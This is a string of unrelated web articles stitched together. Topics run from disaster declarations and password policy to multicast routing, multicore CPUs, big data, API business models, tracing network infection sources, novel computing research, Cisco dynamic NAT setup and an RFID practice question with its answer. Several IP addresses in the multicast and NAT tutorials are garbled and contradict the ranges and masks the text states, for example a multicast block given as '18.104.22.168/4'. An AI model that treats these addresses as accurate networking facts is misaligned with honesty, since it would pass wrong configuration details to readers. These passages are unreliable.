The federal disaster declaration after Katrina for Alabama, Florida, Louisiana and Mississippi paves the way for long-term rebuilding efforts.
Federal emergencies, by contrast, are designed to address shorter-term problems.
For example, Gov. Mike Easley (D) of North Carolina, declared a state emergency on Sept. 10, a day before Hurricane Ophelia poured 12-15 inches of rain on the coastal areas. The declaration allowed National Guard troops to mobilize rescue teams, transportation workers to clear sand off roads and state troopers to provide additional security.
Later that week, Bush also declared a federal state of emergency in North Carolina, allowing federal resources to be used in the cleanup effort.
Shortly after the storm, federal and state emergency officials conducted a survey of the damage inflicted on North Carolina.
If the damage exceeds $9.2 million, the state would qualify for financial aid from the feds, too, said Patty McQuillan, a spokeswoman for the North Carolina Department of Crime Control and Public Safety. State officials pegged the amount of damage at nearly $34 million, according to The Associated Press
Agricultural disasters are handled differently. A governor triggers the relief for counties in his state, but the federal government provides the relief directly to the affected farmers.
This year, Illinois Gov. Rod R. Blagojevich began the process that allowed farmers in 101 of the state's 102 counties to seek low-interest loans from the federal government because of drought conditions.
Following federal law, he asked county offices of the U.S. Department of Agriculture's Farm Service Agency to conduct damage assessment surveys of their areas. The report found that 93 counties qualified for the agriculture disaster designation; the remaining eight bordered counties that were primarily affected.
Blagojevich asked U.S. Agriculture Secretary Mike Johanns to declare an emergency in those 101 counties, which Johanns did.
To qualify for federal help, a farmer in one of the affected counties must lose at least 30 percent of his crop because of the disaster.
The "secretarial declaration" does not offer relief for state or local governments.
Reprinted from Stateline.org. | <urn:uuid:cc1bcf30-74f4-4ac7-a60c-3d53e2804e6e> | CC-MAIN-2017-04 | http://www.govtech.com/public-safety/Emergency-Declarations-Help-States-Cope.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00036-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947336 | 1,224 | 2.96875 | 3 |
David Sancho, senior threat researcher with Trend Micro, has recently written a short but good post in which he pointed out the reasons why despite their inherent insecurity, passwords are here to stay.
Among the advantages they offer are the fact that they can be used straight away, and that they are a good alternative to tying yourself to a specific authentication token, smartphone or location (and all the problems that might arise from that – lost devices, dead batteries, etc.).
He ended his post by giving advice to users on how to choose strong passwords, encouraged them to start using software for managing them, and finally, to use two-factor authentication where possible.
The adoption of the latter is not happening fast enough – whether because many services don’t offer the option, or users are simply not taking advantage of it where it exists – and instructions on how to create strong passwords often falls on deaf ears, so people like Lance James, head of Cyber Intelligence at Deloitte & Touche, are toying with some ideas that would force users to change their password-picking habits.
“One thing I’ve learned about humans is that in most cases, they will take the path of least resistance when it comes to change management, and only when applied pressure (road block is a nice way of putting it) or a reward is offered does this usually disrupt this path,” he recently noted in a blog post.
“We spend a lot of time telling the user to ‘do this because security experts advise it, or it’s part of our policy’ but we don’t really provide an incentive or an understanding of why we tell them to do this. Well humans are programmable, and the best way to see the human brain is to look at it like a Bayesian network. It requires training for it to adapt to change, and repeated consistent data to be provided.”
His proposed solution – described as “Pavlovian password management” – is to create a system that would allow users to choose weak passwords, but would penalize them by making them expire in a few days.
The stronger the chosen password, the longer the period between the initial and the next required moment of choice of a new password. In addition to seamlessly training users to choose better passwords, it would also teach them that no matter how strong a password is, it should be regularly changed.
“[The scheme] could scale password changes over time, since they won’t have to be done at the same time, also reducing predictability and making expiration/changes dependent upon the user,” James notes. “[It] could be also turned into a form of a game such as earning badges for ‘strongest password of the month’, or ‘top 10 security conscious users this week’.”
He makes some good points, and I, for one, would like to see this type of system implemented. Add to this the use of a password manager – one that hopefully has a password generator – and juggling passwords should not be a problem anymore.
Intel is also doing its part to teach users the importance of strong password choices and has recently announced World Password Day 2014, an initiative aimed at propagating good password practices among users. Help Net Security is a supporter of the initiative.
Also, if you are interested in additional tips and information about password alternatives, you can check out the interview we recently did with Per Thorsheim, the founder and main organizer of PasswordsCon, the first and only international conference on passwords. | <urn:uuid:b41a6b89-e8e9-4df4-90d7-7365418749a5> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2014/05/06/password-management-done-right/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00522-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959218 | 737 | 2.546875 | 3 |
Networking 101: Understanding Multicast Routing
Multicast has become a buzzword more than once in history. IP multicast means that one sender is sending data to multiple recipients, but only sending a single copy. It's very useful for streaming media, so let's explore how this works.
Much like broadcast, there are special addresses designated for multicast data. The difference is that some of these can be routed, and used on the Internet. The multicast space reserved by IANA is 18.104.22.168/4. We do not say, "Class D" anymore. The addresses spanned by 224/4 are 22.214.171.124 through 126.96.36.199.
Multicast is more efficient than broadcast, because broadcast packets have to be received by everyone on the local link. Each OS takes an interrupt, and passes the packet on for inspection, which normally involves some data copies. In multicast, the network card doesn't listen to these multicast packets unless it has been told to do so.
By default, with multicast-enabled network cards, the NIC will listen to only 188.8.131.52 at boot. This is the address assigned to "all systems on this subnet." Yes, that's very similar to broadcast. In fact, many people say that broadcast is a special case of multicast.
Multicast is selective in who it sends to, simply by nature of how network cards can ignore uninteresting things. This is how the local link works, but how about the Internet? If someone wants to stream the birth of a celebrity's baby in Africa via multicast, we don't want every router on the Internet consume the bandwidth required to deliver it to each computer. Aside from the NIC being able to make decisions locally, there are multicast routing mechanisms that serve to "prune" certain subnets. If nobody wants to see it within your network, there's no reason to let it travel into the network.
People who are interested in seeing such a spectacle will run a special program, which in turn tells the NIC to join a multicast group. The NIC uses the Internet Group Management Protocol (IGMP) to alert local multicast routers that it'd like to join a specific group. This only works one-way, though. If someone wants to send and receive multicast, the IP layer will need to be fancier. For sending, IP will map an IP address to an Ethernet address, and tell the NIC driver so that it can configure the card with another MAC address.
IGMP itself is very simple. It's very similar to ICMP, because it uses the IP layer, only with a different protocol number. The header consists of only four things: a version; a type; a checksum; and the group, i.e. multicast address, to be joined. When that packet is sent, a multicast router now knows that at least one host is interested in receiving packets for a specific multicast address. Now that router must somehow do multicast routing with other routers to get the data.
Here it gets interesting. There are a few multicast routing mechanisms that we'll talk about today: DVMRP and PIM. Pausing for just a moment, it's important to realize that even today multicast isn't widely supported. Back in the day there was a mbone, or multicast backbone, that people connected to via IPIP (IP encapsulated in IP) tunnels. The Unix application mrouted understood DVMRP and IGMP when the Internet routers did not. Most people who wish to use multicast nowadays still find themselves asking their ISPs why certain protocols aren't working.
DVMRP is the Distance Vector Multicast Routing Protocol. It uses IGMP sub-code 13, and does what's called Dense Flooding. Dense flooding is very effective, but very inefficient. A router will flood to everyone in the beginning, and then prune back uninterested subnets. PIM, or Protocol-Independent Multicast, is independent of unicast routing mechanisms. In dense mode operation, it is very much like DVMRP. PIM dense mode is essentially the same as DVMRP, except PIM uses IP protocol 103. PIM implements joins, prunes, and grafts. A graft is the opposite of a prune: it grafts a branch back onto the tree.
Dense mode multicast routing, regardless of protocol, works by sending data to everyone and then pruning back parts of the tree. A tree, as always, is used to represent a set of routers. When a bunch of branches get pruned, routers can eventually eliminate bigger and bigger chunks. If no branches are interested within an AS, the border router can send a prune message to the upstream router, hence it stops wasting bandwidth.
Sparse mode multicast routing utilizes a Rendezvous Point, or RP. All join messages are sent to the RP's unicast address, so this clearly requires a bit of prior knowledge. PIM sparse mode also operates a bit more intelligently. It uses shared trees, but if a router notices that it's closer to the source it can send a join upstream to ensure traffic starts flowing through the best point. The newly designated router then becomes the source distribution point for the network.
This is all fine and dandy, except for one little detail: the Internet isn't a vertical tree. Enterprises want to connect redundantly, so naturally giant loops will form. Reverse Path Forwarding (RPF) is used in multicast too, to make sure that loops don't happen. The basic idea is verify that the interface a multicast packet arrives on is the shortest unicast path back to the sender. If not, then it probably didn't come from the sender, so the packet is dropped. If the RPF check is successful, the packet is duplicated and sent to everyone in the group.
Quite a few other multicast routing protocols exist in the wild. OSPF has MOSPF, but that can really only be used within one domain. BGP has BGMP, but it's never been seen outside of captivity. Most are not really used, but people are always coming up with new and interesting ideas to make widespread use of multicast a reality. It's such a shame to watch the same video streamed separately from a Web site, when it would save tremendous bandwidth to use multicast and let the router duplicate when it needs to.
In a Nutshell
- Multicast uses special addresses to send data from a single sender to multiple recipients, even though the recipient only sends one copy.
- Hosts or routers can join multicast groups via IGMP to tell other routers that they are interested.
- Dense protocols flood and prune, sparse modes will utilize an RP to avoid flooding unnecessarily. | <urn:uuid:9351a95a-191d-4bbf-82f5-27efa12f4c54> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsp/article.php/10953_3623181_2/Networking-101--Understanding-Multicast-Routing.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00550-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940431 | 1,419 | 3.890625 | 4 |
Opinion: Parallel-processing opportunities pose coding challenges, and diagnostic tools like Intel's VTune Performance Analyzer can help.
Dual-core processors are proliferating through PC product lines, including newly Windows-capable Macintosh systems. April has also seen the open-source release of Sun Microsystems SPARC T1 processor design, with up to four threads running on each of up to eight cores.
Challenges that were once in the domain of supercomputing now present themselves to enterprise architects: Multithreaded cores, multicore processors and multiprocessor grids challenge software writers to rethink tasks for parallel processing.
Processor producers know that if they dont help software developers achieve nearly N-fold speedup from an N-core chip"linear speedup," as its called for shortthen there wont be an attractive return on corporate investment in systems that use these complex processor designs.
Linear speedup is not achievable in most tasks: If an N-core processor merely fetches and concurrently performs successive blocks of instructions at a time, bad things happen, because its common for the input to one instruction to be the output from the one before.
Any approach that performs more than one instruction during a single clock cycle must detect such sequential dependenciesand hold off on executing instructions whose input is not yet available.
In practice, its more common to see power-law speedups with an exponent around 0.7, where two cores run a real task about 60 percent faster than one (2 to the power 0.7 is about 1.6) and four cores run only about 2.6 times as fast as one (4 to the 0.7). Some tasks, such as image processing, have exponents close to 1, while other tasks with strong sequential dependencies show exponents more like 0.3. At the latter degree of parallelization, 32 processors would run less than three times as fast as one.
Click here to read about how the move to multicore CPUs affects software licensing.
In a high-end chip makers nightmare of such diminishing returns, buyers would have every reason to favor simple and mature designs built at razor-thin profit margins by any number of aggressive competitors.
Complex processors do have a payback proposition, paving a path toward more compact, less power-hungry and therefore less heat-generating server installationsbut only if the speedup is there to pay for costly development and state-of-the-art fabrication.
It might seem as if inefficient code would lead to buyers needing more processors to perform a given task, and that this would be just fine with processor vendors, but this cynical reasoning overlooks the competitive environment just describedone in which vendors need to take the lead in wringing maximum ROI from their own technology.
Guru Jakob Nielsen offers advice on designing applications for usability. Click here to watch the video.
Its also clear that cost-effective computing doesnt shrink technology demand. Rather, by pushing previously marginal applications over the threshold of being well worth doing, more cost-effectiveness makes IT vendors more money, not less.
Its therefore no surprise that a company like Intel produces not just chips but also sophisticated tools for optimizing the chips performance. As far back as the debut of Intels first Pentium processors in March 1993, when the chips two concurrent pipelines posed real challenges to developers, Ive found Intels VTune Performance Analyzer a real eye-opener into whats actually happening inside a CPU.
The Windows version of VTune 8.0, released in February, includes full Vista and .Net support: "It can take you down to source code or assembly code, or go up to the thread level or the lock level and diagnose correctness errors with locks," said Intel Development Products Division Director James Reinders, when we talked about the product in March.
Albert Einstein famously said time is what keeps everything from happening all at once; his collaborator John Wheeler is less well-known for adding, "and space is what keeps everything from happening to me."
Software developers may well wish that they could seek refuge in Wheelers space, because Einsteins time is no longer on their side: Making things happen all at once is now their job, with tools like VTune their best hope of getting it done.
Peter Coffee can be reached at email@example.com.
Check out eWEEK.coms for the latest news, reviews and analysis in programming environments and developer tools. | <urn:uuid:681a5d21-1422-4268-b7c0-6f17aab81b58> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Application-Development/Developers-Dont-Have-Time | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00458-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944441 | 917 | 2.515625 | 3 |
Big data and big compute are not new concepts. Before the term “big data” took off as the buzzword du jour, the HPC community expressed these same ideas as compute-intensive and data-intensive computing. Problems were compute-bound or IO-bound or both.
It is the case, however, that the world is in the midst of a data explosion. In 2013, the amount of data flowing through the Internet was 667 exabytes, an amount equivalent to more than 141 billion DVDs. The quick rise of the big data conceptual framework reflects this paradigm. Big compute works nicely as a complementary term. They are essentially two sides of a coin, or are they?
In a recent TEDx Talk, Virginia Tech professor and noted HPC expert Wu Feng discusses how these elements are experienced differently across nations.
Feng begins his talk with a question: “In today’s rapidly evolving technological world, is our future in big data or big compute?”
As he provides an overview of the terms, Feng references HokieSpeed, the GPU-accelerated supercomputer that he developed, which debuted as the greenest commodity supercomputer in the US in November 2011. HokieSpeed is a big compute resource, notes Feng, capable of calculating 500 trillion operations per second*, 100,000 times faster than a typical PC.
HokieSpeed and other systems like it are being used for epidemiological studies, which can be used to guide public policy in the event of disease outbreaks. Simulations boost scientists’ understanding of how viruses spread, enabling them to assist public health officials in devising appropriate containment measures.
Another HokieSpeed project aims to reverse-engineer the brain. Researchers are trying to find repeating patterns of higher-order motor function in EEG brain readings. Simulations are used map neurological pathways.
One of the neurological ailments in the news today is called CTE, a progressive, degenerative brain disease that is affecting athletes with a history of brain trauma, namely concussions. CTE can only be definitely diagnosed after death, but neurologists are working towards diagnosing and treating CTE in living patients. On a PC, this kind of research would take months or years instead of hours or days.
Big data has many definitions, and one important characteristic is that it’s relative, i.e., more data than you are used to. “Big data is your humongous haystack and various algorithms that you use to root around that haystack. Big compute is lots of metal detectors,” explains Feng. “They’re the devices with which you are going to try and find all the little needles of information in the haystack that you can glean some insight and knowledge from.”
Feng makes the case that different nations have different priorities when it comes to investing in big data or big compute.
Back in May 2013, Feng spoke with White House officials to discuss DNA sequencing research in the life sciences. One of the applications here includes finding mutations in genomes. This makes it possible to then infer different pathways that are causing cancer, setting the stage for potential treatments. At this function, there was clearly a focus on big data, notes Feng, while big compute, while important, was clearly secondary.
Three weeks later, Feng traveled to China as part of a US delegation, where he found that the converse was true.
“Here, we look at big data as being more important,” Feng states. “And in China, big compute is more important than big data, so much so that they created a supercomputer called TIANHE-2 that is 282 times faster than HokieSpeed and twice as fast as the fastest US supercomputer.”
They view big data merely as an application area of big compute, notes Feng.
Feng contends that big data, at least in the US, has been elevated to a position above big compute, in part because the compute side is so often hidden from the user. For example, Google returns search results with lightening speed, but the average person does not realize the immensity of the underlying computational infrastructure that has enabled this transaction.
He cites IBM Watson’s Jeopardy appearance as another example of a very visible “big data” application where the compute side was essentially hidden from the audience.
So what should we be investing in? asks Feng. As complementary forces, the data and compute go hand-in-hand. “In order to make sense of the data, we need to compute on the data.” There is a cycle in which data becomes information, then knowledge, then wisdom – and each of these steps requires computing.
*Note: According to Virginia Tech’s announcement, HokieSpeed claims “a single-precision peak of 455 teraflops, 455 trillion operations per second, and a double-precision peak of 240 teraflops, or 240 trillion operations per second.” | <urn:uuid:96221ed9-bfa9-4bd4-9904-6d3a1f0efaee> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/10/big-data-versus-big-compute/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00458-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941352 | 1,027 | 3.34375 | 3 |
Researchers at Indiana University are working on knowledge graphs that use semantic relatedness between concepts to determine the likely truth of a statement.
Until voice recognition technology matures, smartphone users need ways to make text easier to input.
The company is building tools to visualize and analyze streaming location data from smartphones and sensors.
Researchers have found that they can detect people who are potential cybersecurity risks by reading their neural activity.
Stabilitas combines data, maps and local intelligence help organizations operate abroad with greater confidence by knowing the risks they face.
Smartphones can transmit an earthquake’s detected location and magnitude to the U.S. Geological Survey, which can then send alerts to others in the path of the shock waves.
With its market penetration and low power requirements, Bluetooth Smart is positioned to network the Internet of Things.
The AnyPen technology lets users write with a ballpoint pen or graphite pencil, delivering more precise navigation than a finger and eliminating the need for a proprietary stylus.
A researcher at Michigan State University has developed technology that can generate electrical power to buried or implanted sensors.
The technology built into most smartphones can provide more sophisticated authentication than a paper drivers’ license or passport. | <urn:uuid:513c17fd-15ae-412f-8751-c65016c10949> | CC-MAIN-2017-04 | https://gcn.com/blogs/emerging-tech/list/blog-list.aspx?Page=5 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00448-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.898075 | 245 | 2.671875 | 3 |
The API Economy not only offers incredible opportunities to explore new ways to interact with devices and services, but also allows innovators to put a new spin on solving old problems. According to IBM, the API Economy is “the commercial exchange of business functions, capabilities, or competencies as services using web application programming interfaces.” The Internet makes it possible for devices and people all over the world to be connected, whereas APIs utilize hardware and software to exchange information over those connections. As organizations and the public continue to grow more comfortable with implementing API technology in day-to-day activities, the market for API products continues to expand.
The API Economy in Action
If you used your Facebook credentials to log in to a Disqus comment board today, or used a Google maps widget to locate a store you’re visiting later, you’ve already used two different APIs. APIs are also helpful beyond web browsers. For example, if you ordered more Bounty paper towels this morning with an Amazon Dash button, or turned down your home’s Nest thermostat from work using a mobile app, you’re already familiar with Internet of Things devices running APIs.
Succeeding in the Data Economy
APIs used to be developer tools, but now they’re a business model driver. Your business’s products and services can be reworked and implemented in inventive ways to generate new revenue streams. Succeeding in the API Economy is essentially the same as succeeding in the Data Economy—and many businesses find it helpful to treat the API itself as the new product. This may seem a bit unusual since the API shares a lot of assets with another product, but both need to stand alone. Google Maps and the Google Maps API, for example, are two different products that share some of the same primary services.
A well-implemented API will expand on an existing product or concept, which in turn will seize new business growth opportunities. As a general rule, an API should improve performance—making it easier, for instance, for a business to include a map on their website, or for a homeowner to fix thermostat settings remotely. However, APIs require a solid, reliable Internet infrastructure. If that IoT thermostat doesn’t get the message that it should turn off the air conditioning because the server that handles the communication is overloaded, the customer will be less than thrilled. Latency is also important: The communication needs to happen quickly or the customer may give up. Load testing services are essential to making sure your infrastructure is ready to handle communication for your API.
Play Well with Others
APIs are built around the concept of communication and should streamline a specific process with the goal of extending your business to the widest possible audience. Your business may also be on the receiving end of help from another organization’s API. For example, if you were designing a video streaming service aggregator app for phones and tablets, you would work with APIs from services like Netflix, Hulu, and Amazon to gather data on content available on each service. The flip side of pulling in data from multiple sources is that an API typically has to interact with multiple endpoints. For example, the hypothetical IoT thermostat would not only need to work with iOS devices to reach its full audience, but also on Android devices, Windows Phone devices, and desktop web applications.
A well-implemented API is seamlessly integrated into day-to-day activities and environments. When someone sees a Google Maps widget on a store website, they shouldn’t see it as an API, but as a convenient offering that enhances their experience. An effective API Economy strategy addresses what the audience wants or needs—and, most importantly, enhances their experience. | <urn:uuid:fc28e423-dca7-430f-878a-b48de5e91ff8> | CC-MAIN-2017-04 | https://www.apicasystem.com/blog/succeeding-api-economy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00384-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938654 | 763 | 2.578125 | 3 |
One of the problems when it comes to catching online criminals of any kind is the fact that it is often extremely difficult to pinpoint the origins of internet attacks – whether it’s malware, spam, or a rumor that can harm the subject of it.
Until now, this was possible only by scanning all potentially affected network nodes or address spaces for clues – a process that is simply too costly and takes way too much time to be considered globally applicable.
But things are about to change, as Swiss researcher Pedro Pinto and his team from the ?‰cole Polytechnique Fédérale de Lausanne have revealed a new strategy for localizing the source of diffusion in complex networks.
It consists of applying a specific algorithm to measurements collected via only a small fraction of nodes (i.e. connections) throughout the network, and they successfully proved that even by choosing 25 random observers or sensors, they could determine the source of the “infection” with 90 percent confidence.
If they chose well-connected observers, that percentage of confidence was achieved by using only 5 percent of the nodes within a network.
Originally devised to pinpoint the source of real-world epidemics, the technique can easily be applied to computer networks – no matter what their size is. And given that the Internet is a global system of interconnected computer networks, the application of this strategy seems only natural.
The researchers tested the technique against for different types of network structures, and the results were satisfactory every time. Of course, the more connections the chosen nodes had, the smaller percentage of them had to be monitored and pumped for information.
They tested the effectiveness of the algorithm on real data from a South African cholera outbreak and, according to H-Online, on information from the 9/11 terrorists’ publicly released data communications.
The paper the researchers released on Friday before last has garnered a lot of attention in various circles, but Pinto confirmed to Computerworld that computer security companies are the only ones who have contacted them so far, asking for additional information and gauging the ways the technique can be used to localize infection sources on the Internet. | <urn:uuid:155979f0-d971-4f13-a019-f01d4a4901c0> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2012/08/13/scientists-create-algorithm-for-tracking-down-sources-of-online-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00504-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947038 | 443 | 3.15625 | 3 |
Usually, when we identify trends in computing at IT Business Edge, we are referring to the immediate future-a few months or, at most, a year or two ahead. But two recent pieces of news have implications worth paying attention to in a longer timeframe. And, as often is the case with futuristic computing, the ideas are strange: One is living computers based on rotten food (actually, Escherichia coli, or E. coli), and the other involves famously weird quantum science, in which the computer's individual bits aren't called on to be either a zero or a one, the bedrock process of today's devices.
Several sites, including TechEye.net, report on the use of E. coli for computations. The focus of the research is on the composition of logic gates. A logic gate, another fundamental underpinning of computing, takes one or more inputs to produce a single output. Put enough of these together and a full computer task can be completed.
There are seven types of logic gates. For instance, in an "and" logic gate (AND gate), all inputs (A and B) must be "true"-signified in computer-ese as a one-for the output also to be considered true. The other three possible combinations for a two-input AND gate (two falses, true and false, false and true) all create a false. OR gates work in a similar fashion, but the requirements to meet the conditions to reach a result of "true" are different. In an OR gate, A or B must be true for the result to be a one.
The ones and zeros are created by higher and lower levels of electricity. That's where the advance was made. Researchers at the University of California at San Francisco, possibly doing their research in a poorly kept cafeteria, used genes inserted into E. coli strains as the logic gates. Subsequently, the gates released a chemical signal that enabled them to connect to each other as they would on a circuit board, the story says. The ultimate goal was to create a language that would, in essence, enable code to be written as it is for more traditional logic gates.
The other advance was reported by Ars Technica, which describes research published by the Applied Physics Letters by English and Australian researchers. As suggested by the logic gate description above, classical computing is binary: the choices are zero or one. The status of each bit is independent of any other.
Anyone who has read anything about the quantum world probably knows what comes next. In quantum computers, the story says, quantum bits (qubits) are one and zero simultaneously. The operations that are done to the qubits don't switch them from ones to zeros or vice versa; rather, they change the probability that the qubit will eventually be in either state. The second, and related, idea is that an operation on one of the qubits impacts all on that string.
The story says that mistakes come from two areas. One is the "intrinsic uncertainty" associated with quantum operations. The other is purely physical: The quantum world is weird because it is so small. This makes it tricky (to say the least) to come up with equipment that can poke and prod the qubits without gumming things up. The remainder of the story describes what the team set out to do-which involves directional couplers and interferometers-and what it means.
It is too early to tell precisely what these new types of computers would be used for or when the research will show up in products. Quantum science already plays a role in security, but computers based on the approach would be orders of magnitude more complex.
In any case, it is important to have a general idea of what is going on. Scientists have long suspected that Moore's Law on the continuing growth of computing power and reduction in its costs would, like Brett Favre, eventually hit its physical limits. One or these seemingly strange approaches-or both-may allow Moore to play on for decades longer. | <urn:uuid:198e623f-6142-481e-8402-f1c378515e76> | CC-MAIN-2017-04 | http://www.itbusinessedge.com/cm/blogs/weinschenk/is-quantum-mechanics-or-rotten-food-computings-future/?cs=44741 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00412-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956801 | 822 | 3.375 | 3 |
In Part 1 of this series, we discussed static NAT. While static NAT works, since it uses manually constructed “one-to-one” translations, it’s not scalable. For example, translating all of the legal host addresses on the 10.1.2.0/24 subnet would require 254 lines. And if we were dealing with the entire 10.0.0.0/8 network, covering all possible addresses would require over sixteen million lines! The solution is “dynamic NAT”.
In dynamic NAT, instead of specifying the translations one-by-one, you give the NAT device some rules that specify which addresses are translated to what. In the case of a Cisco router, the addresses to be translated are specified by an access control list (ACL), and the addresses to which they are translated are specified by a “pool”.
For example, to translate any address on the 10.1.2.0/24 subnet (those permitted by ACL 1) to an address on the 188.8.131.52/24 network (as specified by the pool named “Test”), you could do this:
- Router(config)#ip nat inside source list 1 pool Test
The translation tells the router that if a packet with source address matching a permit in ACL 1 hits the inside interface, and it is bound for the outside interface, translate the source address to an available address in the pool named “Test”. Obviously, you also need to create ACL 1 and the pool “Test”. Let’s create the ACL first:
- Router(config)#access-list 1 permit 10.1.2.0 0.0.0.255
As is the usual case with a standard IP ACL, this list specifies the source address. Remember that ACLs use a wildcard (inverse) mask. Now, let’s create the pool named “Test” (pool names are case-sensitive):
- Router(config)#ip nat pool Test 184.108.40.206 220.127.116.11 netmask 255.255.255.0
The “netmask” specified for the pool is the subnet mask of the network or subnet containing the translated addresses, and this is not a wildcard (inverse) mask. If you prefer, you can specify the pool’s mask using “slash” (“bitcount”, “CIDR”) notation by using the “prefix-length” option:
- Router(config)#ip nat pool Test 18.104.22.168 22.214.171.124 prefix-length 24
Notice that while the ACL covers 254 addresses, the pool only specifies 127 addresses (due to the “255.255.255.0” or “/24” mask, the pool knows that the address 126.96.36.199 is not legal). Why specify only 127 addresses? First, it’s not likely that all 254 host addresses are actually in use. Second, even if they are in use, it’s not likely that all 254 hosts are simultaneously trying to access the Internet (the company may run several work shifts, for example). The size of the pool only needs to cover the number of hosts that simultaneously require translation, and this conserves public IP addresses (a good thing). Also, if the public addresses are being rented from a provider (typically the case), conserving public IP addresses can save money.
Finally, if it hasn’t already been done, the “inside” and “outside” interfaces must be assigned, just as with static NAT. Let’s assume that FastEthernet0/1 is on the inside, and Serial1/2 is on the outside:
- Router(config)#interface fa0/1
- Router(config-if)#ip nat inside
- Router(config-if)#int s1/2
- Router(config-if)#ip nat outside
If we view the translation table (show ip nat translations) at this point, we would see no entries, because no traffic matching the ACL has attempted to traverse the router from “inside” to “outside”. To trigger a translation, we generate traffic from an “inside” host that’s destined for an “outside” host.
For TCP, entries are placed in the table when a session is built (when the NAT device sees the “SYN” marking the start of a three-way handshake) and removed when the session is terminated. For UDP and ICMP, the translation table entries are created with the first packet in a particular data stream, and the entries are removed when an inactivity timer expires.
Next time, we’ll examine PAT, a variation of dynamic NAT.
Author: Al Friebe | <urn:uuid:212bd9b1-7728-42b0-a233-01e994e2bcc9> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/07/27/nat-and-pat-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00165-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.862251 | 1,042 | 2.65625 | 3 |
The Food and Drug Administration plans to apply the same strict regulations to mobile apps as it does to medical devices, such as blood pressure monitors, if those apps perform the same functions as stand-alone or computer based devices.
The FDA has developed a “tailored” approach to regulation of mobile apps that would allow use of some apps without oversight, according to Dr. Jeffrey Shuren, director of the FDA’s Center for Devices and Radiological Health. “Some mobile apps carry minimal risks to consumers or patients, but others can carry significant risks if they do not operate correctly,” he said. “The FDA’s tailored policy protects patients while encouraging innovation.”
The FDA said that "if a mobile app is intended for use in performing a medical device function (i.e. for diagnosis of disease or other conditions, or the cure, mitigation, treatment, or prevention of disease), it is a medical device, regardless of the platform on which it is run,” in a guidance document for industry and its staff released Monday.
The agency said its oversight approach to mobile apps “is focused on their functionality, just as we focus on the functionality of conventional devices, with oversight not determined by the platform.”
Bakul Patel, senior policy advisor to Shuren, said the agency would regulate a mobile medical app that helps measure blood pressure by controlling the inflation and deflation of a blood pressure cuff (a blood pressure monitor), just as it regulates traditional devices that measure blood pressure
But, he said, a mobile app that doctors or patients use to log and track trends with their blood pressure would not be regulated as a device.
Mobile medical apps that recommend calorie or carbohydrate intakes to people who track what they eat also are also not within the current focus of FDA's regulatory oversight. “While such mobile apps may have health implications, FDA believes the risks posed by these devices are low and such apps can empower patients to be more engaged in their health care,” the agency said.
The agency said that, based on industry estimates, 500 million smartphone users worldwide will be using a health care application by 2015; by 2018, 50 percent of the more than 3.4 billion smartphone and tablet users will have downloaded mobile health applications. These users include health care professionals, consumers, and patients.
The FDA emphasized it won’t regulate the sale or ordinary use of smartphones and tablets, allaying concerns that the agency would try to regulate all mobile gadgets. The new regulations do not cover mobile electronic health record apps.
Mobile apps, the FDA said, can help people manage their own health and wellness, promote healthy living, and gain access to useful information when and where they need it, and the agency “encourages the development of mobile medical apps that improve health care and provide consumers and health care professionals with valuable health information.” | <urn:uuid:4dac745f-d76b-4475-b700-75bd99558844> | CC-MAIN-2017-04 | http://www.nextgov.com/mobile/2013/09/fda-will-regulate-some-mobile-medical-apps-devices/70760/?oref=dropdown | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953069 | 591 | 2.546875 | 3 |
These questions are derived from the Self Test Software Practice Test for CompTIA’s RFID+ exam.
Objective: RF Physics
SubObjective: Identify RF propagation/communication techniques
Single Answer, Multiple Choice
Which mechanism enables a tag’s circuit and an interrogator to communicate with each other to transmit power and information?
- operating frequency
- sequential (SEQ)
Coupling enables a tag’s circuit and an interrogator to communicate with each other to transmit power and information. Coupling occurs when the magnetic fields produced by one circuit overlap those produced by another circuit. The different coupling methods used for RFID applications are inductive coupling, capacitive coupling, and backscatter coupling.
Encoding assists in securing the tag data that is wirelessly communicated to the interrogators. Encoding encrypts the tag data to ensure that the data is read only by authorized interrogators. Several encoding schemes, such as biphase Manchester encoding, pulse interval encoding, or biphase space encoding, are used in RFID systems.
Operating frequency is an electromagnetic frequency that enables tags to power up and communicate with interrogators. The frequency ranges used in RFID systems are low frequency (LF), high frequency (HF), ultra high frequency (UHF), and microwave. LF has the lowest and microwave frequency has the longest read range. Depending on the system requirements and multiple factors, you can choose the appropriate frequency to be used in an RFID system.
